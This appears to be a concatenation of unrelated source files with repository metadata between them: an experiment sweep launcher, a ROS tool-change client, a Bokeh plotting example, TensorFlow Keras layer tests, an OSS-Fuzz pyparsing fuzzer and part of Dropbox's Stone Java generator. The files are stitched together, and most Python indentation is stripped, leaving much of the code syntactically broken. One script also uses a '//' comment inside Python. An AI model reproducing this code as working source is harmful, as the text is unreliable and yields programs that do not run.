sweeper.mount_out_s3 = mount.MountS3(s3_path='', mount_point=docker_mount_point, output=True)
if args.mode == 'ec2':
print("\n" + "**********" * 10 + "\nexp_prefix: {}\nvariants: {}".format(exp_name, len(list(itertools.product(*[value for value in sweep_params.values()])))))
if query_yes_no("Continue?"):
sweeper.run_sweep_ec2(run_experiment, sweep_params, bucket_name=config.S3_BUCKET_NAME, instance_type=instance_type,
region='us-west-1', s3_log_name=exp_name, add_date_to_logname=False)
elif args.mode == 'local_docker':
mode_docker = dd.mode.LocalDocker(
image=sweeper.image,
)
run_sweep_doodad(run_experiment, sweep_params, run_mode=mode_docker,
mounts=sweeper.mounts)
elif args.mode == 'local':
sweeper.run_sweep_serial(run_experiment, sweep_params)
elif args.mode == 'local_singularity':
mode_singularity = dd.mode.LocalSingularity(
image='~/meta_policy_search.simg')
run_sweep_doodad(run_experiment, sweep_params, run_mode=mode_singularity,
mounts=sweeper.mounts)
else:
raise NotImplementedError
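
# Typical call site, as a sketch; `run_experiment` and the parameter grid are
# placeholders for an actual experiment script:
#
#     sweep_params = {'seed': [1, 2, 3], 'rollouts_per_meta_task': [20, 40]}
#     run_sweep(run_experiment, sweep_params, 'promp-sweep', instance_type='c4.xlarge')
#
# and the mode is then chosen on the command line, e.g.
# `python my_script.py --mode local`.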

# ==== ipa-rmb/autopnp :: /autopnp_tool_change/scripts/change_tool_client.py~ ====

#!/usr/bin/python
import roslib; roslib.load_manifest('autopnp_tool_change')
import rospy
import actionlib
import autopnp_tool_change.msg
def go_to_start_position_client(goal):
go_to_start_position_client = actionlib.SimpleActionClient('go_to_start_position_action', autopnp_tool_change.msg.GoToStartPositionAction)
go_to_start_position_client.wait_for_server()
# Creates a goal to send to the action server.
goal = autopnp_tool_change.msg.GoToStartPositionGoal()
goal.goal = "default"
# Sends the goal to the action server.
go_to_start_position_client.send_goal(goal)
# Waits for the server to finish performing the action.
finished_before_timeout = go_to_start_position_client.wait_for_result(rospy.Duration(300, 0))
if finished_before_timeout:
state = go_to_start_position_client.get_state()
print "Action finished: %s"%state
# Prints out the result of executing the action
return state # State after waiting for GoToStartPositionAction
def move_to_chosen_tool_client(goal):
move_to_chosen_tool_client = actionlib.SimpleActionClient('move_to_chosen_tool_action', autopnp_tool_change.msg.MoveToChosenToolAction)
move_to_chosen_tool_client.wait_for_server()
# Creates a goal to send to the action server.
goal = autopnp_tool_change.msg.MoveToChosenToolGoal()
goal.goal = "tag_38"
# Sends the goal to the action server.
move_to_chosen_tool_client.send_goal(goal)
# Waits for the server to finish performing the action.
finished_before_timeout = move_to_chosen_tool_client.wait_for_result(rospy.Duration(300, 0))
if finished_before_timeout:
state = move_to_chosen_tool_client.get_state()
print "Action finished: %s"%state
# Prints out the result of executing the action
return state # State after waiting for MoveToChosenToolAction
if __name__ == '__main__':
try:
# Initializes a rospy node so that the SimpleActionClient can
# publish and subscribe over ROS.
rospy.init_node('GoToStartPosition_client_py')
result = go_to_start_position_client("default")
//result = move_to_chosen_tool_client("tag_38")
except rospy.ROSInterruptException:
print "program interrupted before completion"

# ==== bokeh/bokeh :: /docs/bokeh/source/docs/first_steps/examples/first_steps_4_datetime_axis.py ====

import random
from datetime import datetime, timedelta
from bokeh.models import DatetimeTickFormatter, NumeralTickFormatter
from bokeh.plotting import figure, show
# generate list of dates (today's date in subsequent weeks)
dates = [(datetime.now() + timedelta(day * 7)) for day in range(0, 26)]
# generate 26 random data points (one per date)
y = random.sample(range(0, 100), 26)
# create new plot
p = figure(
title="datetime axis example",
x_axis_type="datetime",
sizing_mode="stretch_width",
max_width=500,
height=250,
)
# add renderers
p.circle(dates, y, size=8)
p.line(dates, y, color="navy", line_width=1)
# format axes ticks
p.yaxis[0].formatter = NumeralTickFormatter(format="$0.00")
p.xaxis[0].formatter = DatetimeTickFormatter(months="%b %Y")
# show the results
show(p)

# ==== NVIDIA/tensorflow :: /tensorflow/python/keras/layers/core_test.py ====

# Copyright 2016 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Tests for Keras core layers."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import numpy as np
from tensorflow.python import keras
from tensorflow.python.eager import context
from tensorflow.python.framework import dtypes
from tensorflow.python.framework import ops
from tensorflow.python.framework import tensor_spec
from tensorflow.python.keras import keras_parameterized
from tensorflow.python.keras import testing_utils
from tensorflow.python.keras.mixed_precision.experimental import policy
from tensorflow.python.ops import array_ops
from tensorflow.python.ops import math_ops
from tensorflow.python.ops import variables
from tensorflow.python.platform import test
@keras_parameterized.run_all_keras_modes
class DropoutLayersTest(keras_parameterized.TestCase):
def test_dropout(self):
testing_utils.layer_test(
keras.layers.Dropout, kwargs={'rate': 0.5}, input_shape=(3, 2))
testing_utils.layer_test(
keras.layers.Dropout,
kwargs={'rate': 0.5,
'noise_shape': [3, 1]},
input_shape=(3, 2))
def test_dropout_supports_masking(self):
dropout = keras.layers.Dropout(0.5)
self.assertEqual(True, dropout.supports_masking)
def test_spatial_dropout_1d(self):
testing_utils.layer_test(
keras.layers.SpatialDropout1D,
kwargs={'rate': 0.5},
input_shape=(2, 3, 4))
def test_spatial_dropout_2d(self):
testing_utils.layer_test(
keras.layers.SpatialDropout2D,
kwargs={'rate': 0.5},
input_shape=(2, 3, 4, 5))
testing_utils.layer_test(
keras.layers.SpatialDropout2D,
kwargs={'rate': 0.5, 'data_format': 'channels_first'},
input_shape=(2, 3, 4, 5))
def test_spatial_dropout_3d(self):
testing_utils.layer_test(
keras.layers.SpatialDropout3D,
kwargs={'rate': 0.5},
input_shape=(2, 3, 4, 4, 5))
testing_utils.layer_test(
keras.layers.SpatialDropout3D,
kwargs={'rate': 0.5, 'data_format': 'channels_first'},
input_shape=(2, 3, 4, 4, 5))
def test_dropout_partial_noise_shape(self):
inputs = keras.Input(shape=(5, 10))
layer = keras.layers.Dropout(0.5, noise_shape=(None, 1, None))
outputs = layer(inputs)
model = keras.Model(inputs, outputs)
out = model(np.ones((20, 5, 10)), training=True)
out_np = keras.backend.get_value(out)
# Test that dropout mask is shared across second dim.
self.assertAllClose(out_np[:, 0, :], out_np[:, 1, :])
@keras_parameterized.run_all_keras_modes
class LambdaLayerTest(keras_parameterized.TestCase):
def test_lambda(self):
testing_utils.layer_test(
keras.layers.Lambda,
kwargs={'function': lambda x: x + 1},
input_shape=(3, 2))
testing_utils.layer_test(
keras.layers.Lambda,
kwargs={
'function': lambda x, a, b: x * a + b,
'arguments': {
'a': 0.6,
'b': 0.4
}
},
input_shape=(3, 2))
# test serialization with function
def f(x):
return x + 1
ld = keras.layers.Lambda(f)
config = ld.get_config()
ld = keras.layers.deserialize({
'class_name': 'Lambda',
'config': config
})
self.assertEqual(ld.function(3), 4)
# test with lambda
ld = keras.layers.Lambda(
lambda x: keras.backend.concatenate([math_ops.square(x), x]))
config = ld.get_config()
ld = keras.layers.Lambda.from_config(config)
self.assertAllEqual(self.evaluate(ld.function([3])), [9, 3])
def test_lambda_multiple_inputs(self):
ld = keras.layers.Lambda(lambda x: x[0], output_shape=lambda x: x[0])
x1 = np.ones([3, 2], np.float32)
x2 = np.ones([3, 5], np.float32)
out = ld([x1, x2])
self.assertAllEqual(out.shape, [3, 2])
def test_lambda_output_shape(self):
l = keras.layers.Lambda(lambda x: x + 1, output_shape=(1, 1))
l(keras.backend.variable(np.ones((1, 1))))
self.assertEqual((1, 1), l.get_config()['output_shape'])
def test_lambda_output_shape_function(self):
def get_output_shape(input_shape):
return 1 * input_shape
l = keras.layers.Lambda(lambda x: x + 1, output_shape=get_output_shape)
l(keras.backend.variable(np.ones((1, 1))))
self.assertEqual('lambda', l.get_config()['output_shape_type'])
def test_lambda_output_shape_autocalculate_multiple_inputs(self):
def lambda_fn(x):
return math_ops.matmul(x[0], x[1])
l = keras.layers.Lambda(lambda_fn, dtype=dtypes.float64)
output_shape = l.compute_output_shape([(10, 10), (10, 20)])
self.assertAllEqual((10, 20), output_shape)
output_signature = l.compute_output_signature([
tensor_spec.TensorSpec(dtype=dtypes.float64, shape=(10, 10)),
tensor_spec.TensorSpec(dtype=dtypes.float64, shape=(10, 20))])
self.assertAllEqual((10, 20), output_signature.shape)
self.assertAllEqual(dtypes.float64, output_signature.dtype)
def test_lambda_output_shape_list_multiple_outputs(self):
def lambda_fn(x):
return x
l = keras.layers.Lambda(lambda_fn, output_shape=[(10,), (20,)])
output_shape = l.compute_output_shape([(10, 10), (10, 20)])
self.assertAllEqual([(10, 10), (10, 20)], output_shape)
def test_lambda_output_shape_tuple_with_none(self):
def lambda_fn(x):
return x
l = keras.layers.Lambda(lambda_fn, output_shape=(None, 10))
output_shape = l.compute_output_shape((5, 10, 20))
self.assertAllEqual([5, None, 10], output_shape.as_list())
def test_lambda_output_shape_function_multiple_outputs(self):
def lambda_fn(x):
return x
def output_shape_fn(input_shape):
return input_shape
l = keras.layers.Lambda(lambda_fn, output_shape=output_shape_fn)
output_shape = l.compute_output_shape([(10, 10), (10, 20)])
self.assertAllEqual([(10, 10), (10, 20)], output_shape)
def test_lambda_output_shape_nested(self):
def lambda_fn(inputs):
return (inputs[1]['a'], {'b': inputs[0]})
l = keras.layers.Lambda(lambda_fn)
output_shape = l.compute_output_shape(((10, 20), {'a': (10, 5)}))
self.assertAllEqual(((10, 5), {'b': (10, 20)}), output_shape)
def test_lambda_config_serialization(self):
# Test serialization with output_shape and output_shape_type
layer = keras.layers.Lambda(
lambda x: x + 1,
output_shape=(1, 1),
mask=lambda i, m: m)
layer(keras.backend.variable(np.ones((1, 1))))
config = layer.get_config()
layer = keras.layers.deserialize({
'class_name': 'Lambda',
'config': config
})
self.assertAllEqual(layer.function(1), 2)
self.assertAllEqual(layer._output_shape, (1, 1))
self.assertAllEqual(layer.mask(1, True), True)
layer = keras.layers.Lambda.from_config(config)
self.assertAllEqual(layer.function(1), 2)
self.assertAllEqual(layer._output_shape, (1, 1))
self.assertAllEqual(layer.mask(1, True), True)
def test_lambda_with_variable(self):
def fn(x):
return x * variables.Variable(2., name='multiplier')
layer = keras.layers.Lambda(fn)
for _ in range(10):
layer(np.ones((10, 10), 'float32'))
self.assertLen(layer.trainable_weights, 1)
self.assertEqual(layer.trainable_weights[0].name, 'lambda/multiplier:0')
def test_lambda_with_training_arg(self):
def fn(x, training=True):
return keras.backend.in_train_phase(x, 2 * x, training=training)
layer = keras.layers.Lambda(fn)
x = keras.backend.ones(())
train_out = layer(x, training=True)
eval_out = layer(x, training=False)
self.assertEqual(keras.backend.get_value(train_out), 1.)
self.assertEqual(keras.backend.get_value(eval_out), 2.)
def test_lambda_with_mask(self):
def add_one(inputs):
return inputs + 1.0
def mask(unused_inputs, previous_mask):
return previous_mask
layer = keras.layers.Lambda(add_one, mask=mask)
x = np.ones([5, 4, 3])
x[:, -1, :] = 0
masking = keras.layers.Masking()
out = layer(masking(x))
expected_out = np.full([5, 4, 3], 2.0)
expected_out[:, -1, :] = 1.0
expected_mask = np.ones([5, 4])
expected_mask[:, -1] = 0.0
self.assertAllClose(self.evaluate(out), expected_out)
self.assertIsNotNone(out._keras_mask)
self.assertAllClose(self.evaluate(out._keras_mask), expected_mask)
class TestStatefulLambda(keras_parameterized.TestCase):
@keras_parameterized.run_all_keras_modes
@keras_parameterized.run_with_all_model_types
def test_lambda_with_variable_in_model(self):
def lambda_fn(x):
# Variable will only get created once.
v = variables.Variable(1., trainable=True)
return x * v
model = testing_utils.get_model_from_layers(
[keras.layers.Lambda(lambda_fn)], input_shape=(10,))
model.compile(
keras.optimizer_v2.gradient_descent.SGD(0.1),
'mae',
run_eagerly=testing_utils.should_run_eagerly(),
experimental_run_tf_function=testing_utils.should_run_tf_function())
x, y = np.ones((10, 10), 'float32'), 2 * np.ones((10, 10), 'float32')
model.fit(x, y, batch_size=2, epochs=2, validation_data=(x, y))
self.assertLen(model.trainable_weights, 1)
self.assertAllClose(keras.backend.get_value(model.trainable_weights[0]), 2.)
@keras_parameterized.run_all_keras_modes
class CoreLayersTest(keras_parameterized.TestCase):
def test_masking(self):
testing_utils.layer_test(
keras.layers.Masking, kwargs={}, input_shape=(3, 2, 3))
def test_keras_mask(self):
x = np.ones((10, 10))
y = keras.layers.Masking(1.)(x)
self.assertTrue(hasattr(y, '_keras_mask'))
self.assertTrue(y._keras_mask is not None)
self.assertAllClose(self.evaluate(y._keras_mask), np.zeros((10,)))
def test_compute_mask_with_positional_mask_arg(self):
class MyLayer(keras.layers.Layer):
def call(self, inputs, mask=None):
return inputs
def compute_mask(self, inputs, mask=None):
if mask is not None:
return array_ops.ones(())
else:
return array_ops.zeros(())
x, mask = array_ops.ones((1, 1)), array_ops.ones((1, 1))
layer = MyLayer()
y = layer(x, mask)
# Check that `mask` was correctly sent to `compute_mask`.
self.assertEqual(keras.backend.get_value(y._keras_mask), 1)
def test_activation(self):
# with string argument
testing_utils.layer_test(
keras.layers.Activation,
kwargs={'activation': 'relu'},
input_shape=(3, 2))
# with function argument
testing_utils.layer_test(
keras.layers.Activation,
kwargs={'activation': keras.backend.relu},
input_shape=(3, 2))
def test_reshape(self):
testing_utils.layer_test(
keras.layers.Reshape,
kwargs={'target_shape': (8, 1)},
input_shape=(3, 2, 4))
testing_utils.layer_test(
keras.layers.Reshape,
kwargs={'target_shape': (-1, 1)},
input_shape=(3, 2, 4))
testing_utils.layer_test(
keras.layers.Reshape,
kwargs={'target_shape': (1, -1)},
input_shape=(3, 2, 4))
testing_utils.layer_test(
keras.layers.Reshape,
kwargs={'target_shape': (-1, 1)},
input_shape=(None, None, 2))
def test_permute(self):
testing_utils.layer_test(
keras.layers.Permute, kwargs={'dims': (2, 1)}, input_shape=(3, 2, 4))
def test_permute_errors_on_invalid_starting_dims_index(self):
with self.assertRaisesRegexp(ValueError, r'Invalid permutation .*dims.*'):
testing_utils.layer_test(
keras.layers.Permute,
kwargs={'dims': (0, 1, 2)}, input_shape=(3, 2, 4))
def test_permute_errors_on_invalid_set_of_dims_indices(self):
with self.assertRaisesRegexp(ValueError, r'Invalid permutation .*dims.*'):
testing_utils.layer_test(
keras.layers.Permute,
kwargs={'dims': (1, 4, 2)}, input_shape=(3, 2, 4))
def test_flatten(self):
testing_utils.layer_test(
keras.layers.Flatten, kwargs={}, input_shape=(3, 2, 4))
# Test channels_first
inputs = np.random.random((10, 3, 5, 5)).astype('float32')
outputs = testing_utils.layer_test(
keras.layers.Flatten,
kwargs={'data_format': 'channels_first'},
input_data=inputs)
target_outputs = np.reshape(
np.transpose(inputs, (0, 2, 3, 1)), (-1, 5 * 5 * 3))
self.assertAllClose(outputs, target_outputs)
def test_flatten_scalar_channels(self):
testing_utils.layer_test(
keras.layers.Flatten, kwargs={}, input_shape=(3,))
# Test channels_first
inputs = np.random.random((10,)).astype('float32')
outputs = testing_utils.layer_test(
keras.layers.Flatten,
kwargs={'data_format': 'channels_first'},
input_data=inputs)
target_outputs = np.expand_dims(inputs, -1)
self.assertAllClose(outputs, target_outputs)
def test_repeat_vector(self):
testing_utils.layer_test(
keras.layers.RepeatVector, kwargs={'n': 3}, input_shape=(3, 2))
def test_dense(self):
testing_utils.layer_test(
keras.layers.Dense, kwargs={'units': 3}, input_shape=(3, 2))
testing_utils.layer_test(
keras.layers.Dense, kwargs={'units': 3}, input_shape=(3, 4, 2))
testing_utils.layer_test(
keras.layers.Dense, kwargs={'units': 3}, input_shape=(None, None, 2))
testing_utils.layer_test(
keras.layers.Dense, kwargs={'units': 3}, input_shape=(3, 4, 5, 2))
def test_dense_dtype(self):
inputs = ops.convert_to_tensor(
np.random.randint(low=0, high=7, size=(2, 2)))
layer = keras.layers.Dense(5, dtype='float32')
outputs = layer(inputs)
self.assertEqual(outputs.dtype, 'float32')
def test_dense_with_policy(self):
inputs = ops.convert_to_tensor(
np.random.randint(low=0, high=7, size=(2, 2)), dtype='float16')
layer = keras.layers.Dense(5, dtype=policy.Policy('infer_float32_vars'))
outputs = layer(inputs)
output_signature = layer.compute_output_signature(
tensor_spec.TensorSpec(dtype='float16', shape=(2, 2)))
self.assertEqual(output_signature.dtype, dtypes.float16)
self.assertEqual(output_signature.shape, (2, 5))
self.assertEqual(outputs.dtype, 'float16')
self.assertEqual(layer.kernel.dtype, 'float32')
def test_dense_regularization(self):
layer = keras.layers.Dense(
3,
kernel_regularizer=keras.regularizers.l1(0.01),
bias_regularizer='l1',
activity_regularizer='l2',
name='dense_reg')
layer(keras.backend.variable(np.ones((2, 4))))
self.assertEqual(3, len(layer.losses))
def test_dense_constraints(self):
k_constraint = keras.constraints.max_norm(0.01)
b_constraint = keras.constraints.max_norm(0.01)
layer = keras.layers.Dense(
3, kernel_constraint=k_constraint, bias_constraint=b_constraint)
layer(keras.backend.variable(np.ones((2, 4))))
self.assertEqual(layer.kernel.constraint, k_constraint)
self.assertEqual(layer.bias.constraint, b_constraint)
def test_activity_regularization(self):
layer = keras.layers.ActivityRegularization(l1=0.1)
layer(keras.backend.variable(np.ones((2, 4))))
self.assertEqual(1, len(layer.losses))
config = layer.get_config()
self.assertEqual(config.pop('l1'), 0.1)
def test_numpy_inputs(self):
if context.executing_eagerly():
layer = keras.layers.RepeatVector(2)
x = np.ones((10, 10))
self.assertAllEqual(np.ones((10, 2, 10)), layer(x))
layer = keras.layers.Concatenate()
x, y = np.ones((10, 10)), np.ones((10, 10))
self.assertAllEqual(np.ones((10, 20)), layer([x, y]))
if __name__ == '__main__':
test.main()
|
1a7be8600f3883cbfb5984eea6702bbfc87c740f
|
38fff7bdefd8d62a740d51329b50d0e1e49258bb
|
/projects/pyparsing/fuzz_parse.py
|
885056300a4d64992726aa9fcee9cb618b71b2b2
|
[
"Apache-2.0"
] |
permissive
|
google/oss-fuzz
|
026384c2ada61ef68b147548e830f60730c5e738
|
f0275421f84b8f80ee767fb9230134ac97cb687b
|
refs/heads/master
| 2023-08-31T23:30:28.157702
| 2023-08-31T21:49:30
| 2023-08-31T21:49:30
| 63,809,205
| 9,438
| 2,315
|
Apache-2.0
| 2023-09-14T20:32:19
| 2016-07-20T19:39:50
|
Shell
|
UTF-8
|
Python
| false
| false
| 2,669
|
py
|
fuzz_parse.py
|
#!/usr/bin/python3
# Copyright 2022 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import os
import sys
import atheris
from pyparsing import (
    Literal,
    Word,
    ZeroOrMore,
    OneOrMore,
    Group,
    Dict,
    Suppress,
    ParseException,
)
def dict_parse_generator(fdp):
"""Generate random parser"""
curr = Literal("f")
special_chars="[]{}/|\<>:;-="
op_count = fdp.ConsumeIntInRange(2, 15)
for i in range(op_count):
        operation = fdp.ConsumeIntInRange(0, 4)
if operation == 0:
l1 = Literal(fdp.PickValueInList(list(special_chars)))
l2 = Literal(fdp.PickValueInList(list(special_chars)))
word = Word(fdp.ConsumeUnicodeNoSurrogates(10))
curr = Group(Dict(ZeroOrMore(word)) + curr)
elif operation == 1:
word1 = Word(fdp.ConsumeUnicodeNoSurrogates(10))
word2 = Word(fdp.ConsumeUnicodeNoSurrogates(10))
curr = Group(Dict(OneOrMore(word1, word2)) + curr)
elif operation == 2:
curr = curr + Word(fdp.ConsumeUnicodeNoSurrogates(10))
elif operation == 3:
curr = curr + Suppress(fdp.ConsumeUnicodeNoSurrogates(2))
else:
word1 = Word(fdp.ConsumeUnicodeNoSurrogates(10))
word2 = Word(fdp.ConsumeUnicodeNoSurrogates(10))
curr = Group(Dict(OneOrMore(word1, word2)) + curr)
return Dict(curr)
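# Illustrative only (not part of the fuzzer): for op_count == 2 with the
# operation sequence (2, 3), the loop above builds a parser equivalent to
#
#   Dict(Literal("f") + Word(<fuzzed chars>) + Suppress(<fuzzed chars>))
#
# i.e. the fixed "f" literal extended by randomly chosen word/suppress terms.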
def TestOneInput(data):
fdp = atheris.FuzzedDataProvider(data)
try:
bnf = dict_parse_generator(fdp)
    except Exception:  # grammar construction can fail on arbitrary fuzz input
return
try:
tokens = bnf.parseString(fdp.ConsumeUnicodeNoSurrogates(1024))
except ParseException:
pass
except TypeError as e:
# Catch the TypeError exception from here:
# https://github.com/pyparsing/pyparsing/blob/d93930308f7fe79f2290812074f62a472c83db59/pyparsing/core.py#L5674
if "could not extract dict values from parsed results" in str(e):
pass
else:
raise e
def main():
atheris.instrument_all()
atheris.Setup(sys.argv, TestOneInput, enable_python_coverage=True)
atheris.Fuzz()
if __name__ == "__main__":
main()
|
6b212efd8b84093890683337f55b97806204c5c1
|
6bf300763e699d53e1588925e56dac1ef872b67c
|
/core/generator/java/java.stoneg.py
|
bd575d25505b3cd82883f6a99296f0bcbe619547
|
[
"MIT"
] |
permissive
|
dropbox/dropbox-sdk-java
|
c7a51c43ea2813579a18a41e47e09b7097f9827e
|
d96bbd5c28b1d2398957931e0ca1e3568b2df41d
|
refs/heads/main
| 2023-08-25T08:58:08.939105
| 2023-08-10T21:31:40
| 2023-08-10T21:31:40
| 10,983,050
| 621
| 581
|
MIT
| 2023-08-10T21:31:41
| 2013-06-27T00:32:18
|
Java
|
UTF-8
|
Python
| false
| false
| 180,888
|
py
|
java.stoneg.py
|
import abc
import argparse
import json
import os
import re
import sys
import types
from collections import defaultdict, OrderedDict
if sys.version_info >= (3, 10):
from collections.abc import Sequence
else:
from collections import Sequence
from contextlib import contextmanager
from functools import (
total_ordering,
wraps,
)
from itertools import chain
from stone.ir import (
ApiNamespace,
ApiRoute,
DataType,
Field,
Int32,
is_boolean_type,
is_bytes_type,
is_composite_type,
is_list_type,
is_map_type,
is_nullable_type,
is_numeric_type,
is_string_type,
is_struct_type,
is_timestamp_type,
is_union_type,
is_user_defined_type,
is_void_type,
StructField,
TagRef,
UnionField,
unwrap_nullable,
)
from stone.backend import CodeBackend
from stone.frontend.ir_generator import parse_data_types_from_doc_ref
class StoneType(metaclass=abc.ABCMeta):
pass
StoneType.register(ApiNamespace)
StoneType.register(ApiRoute)
StoneType.register(DataType)
StoneType.register(Field)
def cached(f):
cache = {}
@wraps(f)
def wrapper(*args, **kwargs):
key = tuple(args) + tuple(entry for entry in sorted(kwargs.items()))
if key in cache:
return cache[key]
else:
val = f(*args, **kwargs)
cache[key] = val
return val
return wrapper
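# Usage sketch (illustrative; `expensive_resolve` is a hypothetical helper):
# results are memoized per argument tuple, so repeated calls with identical
# positional/keyword arguments skip recomputation.
#
#   @cached
#   def resolve(name, strict=False):
#       return expensive_resolve(name, strict)
#
#   resolve('files')  # computed once
#   resolve('files')  # returned from the cache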
class cached_property:
"""
Decorator similar to @property, but which caches the results permanently.
"""
def __init__(self, func):
self._func = func
self._attr_name = func.__name__
def __get__(self, instance, owner):
if instance is None:
return self
else:
val = self._func(instance)
instance.__dict__[self._attr_name] = val
return val
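# Usage sketch (illustrative; `parse_spec` is hypothetical): the first access
# runs the function and stores the result directly in the instance __dict__,
# so later accesses bypass the descriptor entirely.
#
#   class Spec:
#       @cached_property
#       def parsed(self):
#           return parse_spec(self.raw)  # expensive call happens once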
def _fixreserved(s):
if s in _RESERVED_KEYWORDS:
s += '_'
return s
def _capwords(s):
words = s.replace('/', '_').split('_')
return ''.join(w[:1].upper() + w[1:] for w in words)
def _camelcase(s):
s = _capwords(s)
return s[:1].lower() + s[1:]
def _allcaps(s):
return s.replace('/', '_').upper()
def capwords(s):
return _fixreserved(_capwords(s))
def camelcase(s):
return _fixreserved(_camelcase(s))
def allcaps(s):
return _fixreserved(_allcaps(s))
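# Illustrative examples of the naming helpers above (assuming 'for' appears in
# _RESERVED_KEYWORDS):
#
#   capwords('upload_session/start')   -> 'UploadSessionStart'
#   camelcase('upload_session/start')  -> 'uploadSessionStart'
#   allcaps('upload_session/start')    -> 'UPLOAD_SESSION_START'
#   camelcase('for')                   -> 'for_'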
def collapse_whitespace(s):
return "\n".join(
line.strip() for line in s.strip().splitlines()
)
def split_paragraphs(s):
paragraph = []
for line in s.splitlines():
line = line.strip()
if line == '':
if paragraph:
yield "\n".join(paragraph)
del paragraph[:]
else:
paragraph.append(line)
if paragraph:
yield "\n".join(paragraph)
def split_stone_name(stone_fq_name, max_parts):
assert isinstance(stone_fq_name, str), repr(stone_fq_name)
assert max_parts > 0, "max_parts must be positive"
parts = stone_fq_name.split('.')
if len(parts) > max_parts:
raise ValueError('Malformed Stone reference: %s' % stone_fq_name)
else:
filler = (None,) * (max_parts - len(parts))
return filler + tuple(parts)
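# Illustrative examples:
#
#   split_stone_name('files.Metadata', 3)       -> (None, 'files', 'Metadata')
#   split_stone_name('files.Metadata.name', 3)  -> ('files', 'Metadata', 'name')
#   split_stone_name('files.Metadata.name', 2)  -> raises ValueError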
def sanitize_pattern(pattern):
return pattern.replace('\\', '\\\\').replace('"', '\\"')
_JAVADOC_REPLACEMENT_CHARS = (
    ('&', '&amp;'),
    ('<', '&lt;'),
    ('>', '&gt;'),
)
def sanitize_javadoc(doc):
# sanitize &, <, > characters
for char, code in _JAVADOC_REPLACEMENT_CHARS:
doc = doc.replace(char, code)
return doc
def unsanitize_javadoc(doc):
for char, code in _JAVADOC_REPLACEMENT_CHARS:
doc = doc.replace(code, char)
return doc
def oxford_comma_list(values, conjunction='and'):
if not values:
return None
elif len(values) == 1:
return values[0]
elif len(values) == 2:
return '{} {} {}'.format(values[0], conjunction, values[1])
else:
return '{}, {} {}'.format(', '.join(values[:-1]), conjunction, values[-1])
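# Illustrative examples:
#
#   oxford_comma_list(['a'])                         -> 'a'
#   oxford_comma_list(['a', 'b'])                    -> 'a and b'
#   oxford_comma_list(['a', 'b', 'c'])               -> 'a, b and c'
#   oxford_comma_list(['a', 'b'], conjunction='or')  -> 'a or b'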
def classname(s):
return capwords(s)
def get_ancestors(data_type):
"""Return list of (tag, data_type) pairs.
The first pair is the root and always has tag None.
The last pair represents the argument.
    The tag is only present if the data_type in that pair has an
    ancestor and is a member of that ancestor's enumerated subtypes.
Suppose we have the following tree:
struct A
struct B extends A
struct C extends B
Without enumerated subtypes:
- get_ancestors(C) returns [(None, A), (None, B), (None, C)]
- get_ancestors(B) returns [(None, A), (None, B)]
- get_ancestors(A) returns [(None, A)]
Now add enumerated subtypes, so the tree becomes:
struct A
union
b B
struct B extends A
union
c C
struct C extends B
Now the return values are:
- get_ancestors(C) returns [(None, A), ('b', B), ('c', C)]
- get_ancestors(B) returns [(None, A), ('b', B)]
- get_ancestors(A) returns [(None, A)]
"""
assert isinstance(data_type, DataType), repr(data_type)
ancestors = []
while data_type is not None:
parent_type = data_type.parent_type
tag = None
if parent_type is not None and parent_type.has_enumerated_subtypes():
for field in parent_type.get_enumerated_subtypes():
if field.data_type is data_type:
tag = field.name
break
else:
assert False, "Type {} not found in subtypes of ancestor {}".format(data_type.name,
parent_type.name)
ancestors.append((tag, data_type))
data_type = parent_type
ancestors.reverse()
return ancestors
def get_enumerated_subtypes_recursively(data_type):
"""
Returns a list of (tag, DataType) pairs.
This method searches for all possible enumerated subtypes of the given data type. In the
example:
struct A
union
b B
c C
struct B extends A
union
d D
e E
struct C extends A
union
f F
struct D extends B
struct E extends B
struct F extends C
The following value would be returned:
- get_enumerated_subtypes_recursively(A): [('b', B), ('c', C), ('b.d', D), ('b.e', E), ('c.f', F)]
- get_enumerated_subtypes_recursively(B): [('b.d', D), ('b.e', E)]
- get_enumerated_subtypes_recursively(C): [('c.f', F)]
- get_enumerated_subtypes_recursively(D): []
"""
assert isinstance(data_type, DataType), repr(data_type)
if not data_type.has_enumerated_subtypes():
return []
subtypes = []
def add_subtype(data_type):
subtypes.append(data_type)
if data_type.has_enumerated_subtypes():
for subtype in data_type.get_enumerated_subtypes():
add_subtype(subtype.data_type)
add_subtype(data_type)
result = []
for subtype in subtypes:
tag = '.'.join(name for name, _ in get_ancestors(subtype) if name)
result.append((tag, subtype))
return result
def get_underlying_type(data_type, allow_data_structures=True):
assert isinstance(data_type, DataType), repr(data_type)
while True:
if allow_data_structures and is_list_type(data_type):
data_type = data_type.data_type
elif allow_data_structures and is_map_type(data_type):
data_type = data_type.value_data_type
elif is_nullable_type(data_type):
data_type = data_type.data_type
else:
break
return data_type
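# Illustrative: containers and nullables are peeled down to the element type.
# For a field declared as List(Nullable(FooStruct)) (hypothetical type):
#
#   get_underlying_type(field_type)                               -> FooStruct
#   get_underlying_type(field_type, allow_data_structures=False)  -> the List type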
def union_create_with_method_name(data_type, value_fields_subset):
if len(value_fields_subset) > 0:
method_suffix = 'And%s' % _capwords(value_fields_subset[0].name)
else:
method_suffix = ''
return 'withTag%s' % method_suffix
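# Illustrative (assuming a union field whose name is 'foo'); only the first
# field in the subset influences the method-name suffix:
#
#   union_create_with_method_name(dt, [])           -> 'withTag'
#   union_create_with_method_name(dt, [field_foo])  -> 'withTagAndFoo'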
def format_func_name(route):
return '{}_v{}'.format(route.name, route.version) if route.version > 1 else route.name
@total_ordering
class JavaClass:
"""
Represents a Java class name.
This class is a convenience for handling Java classes. This class lets you reference a Java
class explicitly by its fully-qualified name or its short-name.
:ivar str fq_name: Fully-qualified Java class name
"""
def __init__(self, fq_name, generics=()):
assert isinstance(fq_name, str), repr(fq_name)
assert isinstance(generics, Sequence), repr(generics)
